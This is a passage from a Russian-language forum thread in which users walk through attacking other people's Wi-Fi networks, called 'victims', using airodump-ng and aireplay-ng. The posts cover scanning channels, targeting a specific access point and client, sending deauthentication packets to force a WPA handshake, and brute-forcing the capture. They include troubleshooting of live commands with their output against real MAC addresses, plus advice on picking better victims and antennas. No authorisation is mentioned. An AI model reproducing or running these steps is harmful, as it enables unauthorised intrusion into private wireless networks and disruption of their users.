    airodump-ng mon0 -a -c 6 (-а не показывать неассоциированных клиентов, т.е. просто wifi устройства не подключенные к сети - с 6 - шестой канал, смотреть нужно по каналам так сразу видишь качество приема жертвы на конкретном канале, записываешь мак жертвы: точнее два мака точки доступа и клиента)

    5. Выбрав жертву отключаешь аирдамп и запускаешь мониторить именно жертву
    airodump-ng mon0 -a -d MM:MM:MM:MM:MM:MM -c 6 -w filename (тут MM:MM:MM:MM:MM:MM mac точки доступа жертвы, канал также шестой нужно поставит на тот на котором сидит жертва, -w записать пойманные данные в файл с именем filename)

    6. Одновременно не отключая аирдампа в соседней консоли даешь команду
    aireplay-ng mon0 -a MM:MM:MM:MM:MM:MM -c CC:CC:CC:CC:CC:CC -0 5 (тут MM:MM:MM:MM:MM:MM - мак точки доступа жертвы, СС:СС:СС:СС:СС:СС мак клиента жертвы, -0 команда на отключения клиента от точки доступа, 5 - количество попыток отключения) Как дашь команду не торопись подожди минутку смотря на первую консоль, не пойман ли шендшейк, если не пойман то повтори попытку отключения клиента от точки доступа и во второй консоле. После пойманного хендшейка брутишь файл filename.cap. Чем брутить это уже другое дело либо тут выложить кто нибудь да поможет, или самому.

    Ну вот вроде все разжевал.
    Для отсутствия ошибки fixset channel -1 не подымай основной интерфейс.
     
  16. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Спасибо все понятно, польшенство я так и делал. Вот у вас под цифрой 6: вывод такой у меня:
    Code:
    root@kali-Linux:~# aireplay-ng mon0 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
    21:39:31  Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel -1
    21:39:41  No such BSSID available.
    
    Только не понял:
    Как это не поднимать основной интерфейс
     
  17. Biship

    Biship Member

    Joined:
    30 Jan 2012
    Messages:
    37
    Likes Received:
    15
    Reputations:
    0
    так и не поднимать, если ты под кали просто попробуй ifconfig wlanX down а работать будешь с новым mon0, и в aireplay не надо указывать оба параметра -e и -a достаточно просто -a
     
  18. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Да верно, спасибо ошибка ушла:
    Code:
     CH 10 ][ Elapsed: 0 s ][ 2015-05-12 21:58   
       
     BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
       
     02:2F:0F:AE:44:A9  -1  0  9  0  0  10  11  OPN  HP02ACAB   
       
     BSSID  STATION  PWR  Rate  Lost  Frames  Probe   
       
     02:2F:0F:AE:44:A9  2C:76:8A:02:AC:AB  -67  0 - 1  13  9   
    
    А вот в отключенни ESSID все равно требует, и ошибка не ушла:
    Code:
    root@kali-Linux:~# aireplay-ng mon0 -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
    21:55:37  Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel 10
    21:55:47  No such BSSID available.
    Please specify an ESSID (-e).
    root@kali-Linux:~# aireplay-ng mon0 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
    21:56:54  Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel 10
    21:57:04  No such BSSID available.
    
     
  19. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Интересно он в строке fixset channel вот что пишет:
    Code:
    CH 10 ][ Elapsed: 9 mins ][ 2015-05-12 22:07 ][ fixed channel mon0: 13 
     
    BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
     
    02:2F:0F:AE:44:A9  -1  0  3257  0  0  10  11  OPN  HP02ACAB 
     
    BSSID  STATION  PWR  Rate  Lost  Frames  Probe 
     
    02:2F:0F:AE:44:A9  2C:76:8A:02:AC:AB  -63  0 - 1  38  3257 
    
    С 1 по (примерно) 15 подбирает, я зафиксировал 13. Так и должно быть?
    WLAN0 отключен:
    Code:
    root@kali-Linux:~# ifconfig
    eth0  Link encap:Ethernet  HWaddr 28:d2:44:a9:92:6c 
      UP BROADCAST MULTICAST  MTU:1500  Metric:1
      RX packets:0 errors:0 dropped:0 overruns:0 frame:0
      TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:1000
      RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
    
    lo  Link encap:Local Loopback 
      inet addr:127.0.0.1  Mask:255.0.0.0
      inet6 addr: ::1/128 Scope:Host
      UP LOOPBACK RUNNING  MTU:65536  Metric:1
      RX packets:112 errors:0 dropped:0 overruns:0 frame:0
      TX packets:112 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:0
      RX bytes:6720 (6.5 KiB)  TX bytes:6720 (6.5 KiB)
    
    mon0  Link encap:UNSPEC  HWaddr 9C-AD-97-4D-37-19-3A-30-00-00-00-00-00-00-00-00 
      UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI  MTU:1500  Metric:1
      RX packets:590118 errors:0 dropped:14140 overruns:0 frame:0
      TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:1000
      RX bytes:122378467 (116.7 MiB)  TX bytes:0 (0.0 B)
    
    usb0  Link encap:Ethernet  HWaddr 36:4b:50:b7:ef:2d 
      inet addr:192.168.0.182  Bcast:192.168.0.255  Mask:255.255.255.0
      inet6 addr: fe80::344b:50ff:feb7:ef2d/64 Scope:Link
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      RX packets:19581 errors:0 dropped:0 overruns:0 frame:0
      TX packets:19497 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:1000
      RX bytes:17222457 (16.4 MiB)  TX bytes:2192415 (2.0 MiB)
    
    Потому что в начале мониторинга этого не наблюдается:
    Code:
     CH 10 ][ Elapsed: 16 s ][ 2015-05-12 22:14   
       
     BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
       
     02:2F:0F:AE:44:A9  -1  0  130  0  0  10  11  OPN  HP02ACAB   
       
     BSSID  STATION  PWR  Rate  Lost  Frames  Probe   
       
     02:2F:0F:AE:44:A9  2C:76:8A:02:AC:AB  -67  0 - 1  19  130 
    
     
    #79 Василий-Шишкин, 12 May 2015
    Last edited: 12 May 2015
  20. Biship

    Biship Member

    Joined:
    30 Jan 2012
    Messages:
    37
    Likes Received:
    15
    Reputations:
    0
    Судя по показаниям аирдампа точка доступа далеко и ты видишь только клинета, попробуй на другой жертве. желательно чтобы показатель RXQ был близок к 100. Почитай об использовании направленных антенн есть такой форум по антеннам lan23.ru там множество конструкций антенн для нашего дела из подручных материалов.
     
Loading...